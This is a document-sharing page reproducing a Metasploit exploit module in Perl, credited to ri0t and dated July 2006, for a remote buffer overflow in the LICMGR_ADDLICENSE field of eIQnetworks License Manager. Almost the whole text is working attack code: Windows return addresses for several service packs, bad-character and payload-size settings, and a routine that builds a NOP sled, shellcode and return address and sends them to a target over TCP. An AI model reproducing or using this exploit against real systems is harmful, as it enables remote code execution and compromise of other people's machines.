Docstoc

eIQnetworks License Manager Remote Buffer Overflow Exploit 1262

Document Sample
eIQnetworks License Manager Remote Buffer Overflow Exploit 1262 Powered By Docstoc
					                       eIQnetworks License Manager Remote Buffer Overflow Exploit 1262                 Page 1/2
       1   #!/usr/bin/perl −w
       2
       3   #metasploit module for EIQ Licence manager overflow Provided by ri0t of Bastard Labs
       4
       5   package Msf::Exploit::EiQ_License_1262;
       6   use base "Msf::Exploit";
       7   use strict;
       8   use Pex::Text;
       9
   10      my $advanced = { };
   11
   12      my $info =
   13        {
   14              ’Name’         => ’EIQ License Manager Overflow’,
   15              ’Authors’    => [ ’ri0t ri0t@ri0tnet.net, KF kf_list@digitalmunition.com’ ],
   16
   17              ’Arch’ => [ ’x86’ ],
   18              ’OS’    => [ ’win32’, ’win2000’, ’winxp’ ],
   19              ’Priv’ => 0,
   20
   21              ’AutoOpts’    => { ’EXITFUNC’ => ’seh’ },
   22
   23              ’UserOpts’ =>
   24                {
   25                        ’RHOST’ => [1, ’ADDR’, ’The target address’],
   26                        ’RPORT’ => [1, ’PORT’, ’The target port’, 10616],
   27               },
   28              ’Payload’ =>
   29                {
   30                        ’Space’ => 1262,
   31                        ’BadChars’ => "\x00\x0a\x0d\x40\x26",
   32                   },
   33                ’Description’ => Pex::Text::Freeform(qq{
   34              This module exploits the buffer overflow found in the LICMGR_ADDLICENSE
   35              Field of EIQ networks network analyser this module exploits buffers of 1262 bytes
   36              in size. This module should work on all rebranded eiq analysers. Exploitation
   37              assistance from KF of digital munition.
   38              }),
   39
   40
   41              ’DefaultTarget’ => 1,
   42              ’Targets’ =>
   43                [
   44                        [’Windows 2000 SP0−SP4 English’, 0x750316e2],      # call ebx
   45                        [’Windows XP English SP1/SP2’, 0x77db64dc ],             # jmp ebx
   46                        [’Windows Server 2003 English SP0/SP1’, 0x77d16764 ],   # jmp ebx
   47                ],
   48
   49        };
   50
   51        sub new {
   52              my $class = shift;
ri0t                                                                                                   07/26/2006
                      eIQnetworks License Manager Remote Buffer Overflow Exploit 1262                                           Page 2/2
   53             my $self = $class−>SUPER::new({’Info’ => $info, ’Advanced’ => $advanced}, @_);
   54             return($self);
   55   }
   56
   57       sub Exploit {
   58             my $self = shift;
   59             my $target_host =    $self−>GetVar(’RHOST’);
   60             my $target_port =    $self−>GetVar(’RPORT’);
   61             my $target_idx =     $self−>GetVar(’TARGET’);
   62             my $shellcode   =    $self−>GetVar(’EncodedPayload’)−>Payload;
   63             my $target      =    $self−>Targets−>[$target_idx];
   64             my $nops        =    $self−>MakeNops(1262 − length($shellcode));
   65             my $ret         =     pack("V", $target−>[1]);
   66             my $evil        =    "LICMGR_ADDLICENSE&" . $nops . $shellcode . $ret . "&";
   67
   68
   69            my $s = Msf::Socket::Tcp−>new
   70              (
   71                    ’PeerAddr’ => $target_host,
   72                    ’PeerPort’ => $target_port,
   73                    ’LocalPort’ => $self−>GetVar(’CPORT’),
   74              );
   75
   76                if ($s−>IsError) {
   77                      $self−>PrintLine(’[*] Error creating socket: ’ . $s−>GetError);
   78                      return;
   79            }
   80                $self−>PrintLine(sprintf ("[*] Trying ".$target−>[0]." using return address 0x%.8x....", $target−>[1]));
   81
   82                $s−>Send("$evil");
   83                return;
   84       }
   85
   86   # milw0rm.com [2006−07−26]




ri0t                                                                                                                            07/26/2006

				
DOCUMENT INFO